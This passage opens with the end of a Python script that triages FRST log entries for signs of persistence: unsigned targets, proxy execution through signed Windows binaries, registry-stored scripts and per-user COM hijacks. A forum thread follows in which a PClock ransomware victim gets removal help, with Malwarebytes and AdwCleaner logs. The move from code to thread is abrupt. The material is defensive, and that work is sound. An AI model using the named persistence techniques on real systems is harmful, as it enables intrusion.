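    if "[File not signed]" in line:
        f.reasons.append("target not digitally signed")
    name = RUN_VALUE_NAME.search(line)
    if name and INVALID_NAME_CHARS.search(name.group("name")):
        f.reasons.append("value name uses characters FRST treats as invalid")
    if PROXY_BINARIES.search(line):
        f.reasons.append("execution proxied through a signed Windows binary")
    if REGISTRY_SCRIPT.search(line):
        f.reasons.append("script payload stored in or read back from the registry")
    if f.kind == "COM server" and PER_USER_HIVE.match(line):
        f.reasons.append("per-user InprocServer32 shadows the machine-wide class (COM hijack)")
    return f


def triage(log_text: str) -> List[Finding]:
    """Return only the entries that raised at least one reason, in log order."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if line:
            f = triage_line(line)
            if f.reasons:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.kind}] {f.path or '-'}")
        for reason in f.reasons:
            print("   -", reason)
```

Run against the constructed sample, the clean Realtek entry is the only one that produces no finding; the remaining seven each carry the reasons a responder would write into the fixlist.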

#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 01:38 PM

Can you upload an encrypted file and a ransom note to ID-Ransomware, and copy/paste the result here? CryptoLocker has been killed off years ago, so I doubt you were hit with it.

https://id-ransomware.malwarehunterteam.com/

We need to find which Ransomware you were hit by first.



#7 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 03:11 PM

PClock

Attached is the printscreen answer.

Attached Files



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 03:20 PM

Sadly as ID-Ransomware states, there's no way to decrypt files encrypted with the updated variant of PClock. The best thing you can do right now is back up all the encrypted files somewhere safe and hope that a free decryption solution will be released in the future.



#9 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 04:06 PM

OK.

So what's the next step?

I really need access to these files.

Should I pay the bastards?



#10 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 04:30 PM

So what's the next step?


It's as I told you before. You should back up your files somewhere safe and hope that a free decryption solution gets released in the future.

So what's the next step?


This would only encourage their business, and as someone who spends my time fighting against criminals like that, I cannot encourage you to do so. It's your choice.



#11 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 25 June 2017 - 04:43 PM

So what's the next step?


It's as I told you before. You should back up your files somewhere safe and hope that a free decryption solution gets released in the future.

So what's the next step?


This would only encourage their business, and as someone who spends my time fighting against criminals like that, I cannot encourage you to do so. It's your choice.

Fair enough.

Do we have any more steps needed to be done?



#12 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 25 June 2017 - 07:55 PM

Yes, I would like to run a few more scans on your system, as it appears that you were infected with malware other than PClock.

Malwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run, the time required to complete the scan depends on your system and computer specs;
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button;
    • If it asks you to restart your computer to complete the removal, do so;
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply;



#13 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 26 June 2017 - 12:49 PM

Here are the scan results from Malwarebytes:

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 6/26/17
Scan Time: 7:38 AM
Log File: 
Administrator: Yes
 
-Software Information-
Version: 3.1.2.1733
Components Version: 1.0.139
Update Package Version: 1.0.2232
License: Trial
 
-System Information-
OS: Windows 7 Service Pack 1
CPU: x86
File System: NTFS
User: Landbase\Sachyani
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 248146
Threats Detected: 19
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 6 min, 45 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
-Scan Details-
Process: 1
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SPYHUNTER4.EXE, No Action By User, [944], [396112],1.0.2232
 
Module: 1
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SPYHUNTER4.EXE, No Action By User, [944], [396112],1.0.2232
 
Registry Key: 6
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\SpyHunter, No Action By User, [944], [345850],1.0.2232
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\SpyHunter4Startup, No Action By User, [944], [331711],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGSCANNER, No Action By User, [944], [331708],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\SpyHunter 4 Service, No Action By User, [944], [331704],1.0.2232
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0AFA7312-957F-4031-8755-832DF5C30C64}, No Action By User, [944], [332366],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGIGUARD, No Action By User, [944], [331706],1.0.2232
 
Registry Value: 3
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGSCANNER|IMAGEPATH, No Action By User, [944], [331708],1.0.2232
PUP.Optional.SpyHunter, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0AFA7312-957F-4031-8755-832DF5C30C64}|PATH, No Action By User, [944], [332366],1.0.2232
PUP.Optional.SpyHunter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\ESGIGUARD|IMAGEPATH, No Action By User, [944], [331706],1.0.2232
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 8
PUP.Optional.SpyHunter, C:\USERS\SACHYANI\APPDATA\ROAMING\ENIGMA SOFTWARE GROUP\SH_INSTALLER.EXE, No Action By User, [944], [345850],1.0.2232
PUP.Optional.Solvusoft, C:\USERS\SACHYANI\DOWNLOADS\SETUP_DRIVERDOC_2016.EXE, No Action By User, [362], [331663],1.0.2232
PUP.Optional.SpyHunter, C:\USERS\SACHYANI\DOWNLOADS\SPYHUNTER-INSTALLER.EXE, No Action By User, [944], [345850],1.0.2232
PUP.Optional.SpyHunter, C:\WINDOWS\SYSTEM32\TASKS\SPYHUNTER4STARTUP, No Action By User, [944], [331709],1.0.2232
PUP.Optional.SpyHunter, C:\WINDOWS\SYSTEM32\DRIVERS\ESGSCANNER.SYS, No Action By User, [944], [331708],1.0.2232
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SH4SERVICE.EXE, No Action By User, [944], [331704],1.0.2232
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\SPYHUNTER4.EXE, No Action By User, [944], [396112],1.0.2232
PUP.Optional.SpyHunter, C:\PROGRAM FILES\ENIGMA SOFTWARE GROUP\SPYHUNTER\ESGIGUARD.SYS, No Action By User, [944], [331706],1.0.2232
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)


#14 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,485 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:35 AM

Posted 26 June 2017 - 12:53 PM

If you want to keep SpyHunter, you can uncheck its entries (PUP.Optional.SpyHunter) and delete the rest. If you want to get rid of SpyHunter, uninstall it first, then delete the threats Malwarebytes detected.

Once done, let's run AdwCleaner and JRT. For AdwCleaner, it might detect SpyHunter as well (if you kept it), so be sure to uncheck its entries before clicking on the Clean button.

AdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), let the database update, then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Cleaning button. This will kill all the active processes;
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
Junkware Removal Tool (JRT)
  • Download Junkware Removal Tool (JRT) and move it to your Desktop;
  • Right-click on JRT.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Press any key to launch the scan and let it complete;
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply;
Your next reply(ies) should therefore contain:
  • Copy/pasted AdwCleaner clean log;
  • Copy/pasted JRT log;



#15 sachyani

sachyani
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:09:35 AM

Posted 26 June 2017 - 01:47 PM

Here is the log from the adwcleaner scan:

# AdwCleaner v6.047 - Logfile created 26/06/2017 at 21:39:52
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-06-26.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X86)
# Username : Sachyani - LANDBASE
# Running from : C:\Users\Sachyani\Desktop\AdwCleaner.exe
# Mode: Clean
 
 
 
***** [ Services ] *****
 
[-] Service deleted: EsgScanner
 
 
***** [ Folders ] *****
 
[-] Folder deleted: C:\Users\Sachyani\AppData\Local\DriverToolkit
[-] Folder deleted: C:\Program Files\DriverToolkit
[-] Folder deleted: C:\Users\Sachyani\AppData\Roaming\Mozilla\Firefox\Profiles\l6e3v380.default\extensions\safesearchplus2@avira.com
[-] Folder deleted: C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipmkfpcnmccejididiaagpgchgjfajgp
 
 
***** [ Files ] *****
 
 
 
***** [ DLL ] *****
 
 
 
***** [ WMI ] *****
 
 
 
***** [ Shortcuts ] *****
 
 
 
***** [ Scheduled Tasks ] *****
 
 
 
***** [ Registry ] *****
 
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\DriverToolkit
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000\Software\ParetoLogic
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212159971\Software\DriverToolkit
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212159971\Software\ParetoLogic
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212547023\Software\DriverToolkit
[-] Key deleted: HKU\S-1-5-21-1874987202-1180172134-3449041409-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-06262017212547023\Software\ParetoLogic
[#] Key deleted on reboot: HKCU\Software\DriverToolkit
[#] Key deleted on reboot: HKCU\Software\ParetoLogic
[-] Key deleted: HKLM\SOFTWARE\ParetoLogic
[-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\ipmkfpcnmccejididiaagpgchgjfajgp
 
 
***** [ Web browsers ] *****
 
[-] [C:\Users\Sachyani\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ipmkfpcnmccejididiaagpgchgjfajgp
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C0].txt - [2329 Bytes] - [26/06/2017 21:39:52]
C:\AdwCleaner\AdwCleaner[S0].txt - [2725 Bytes] - [26/06/2017 21:34:26]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [2475 Bytes] ##########




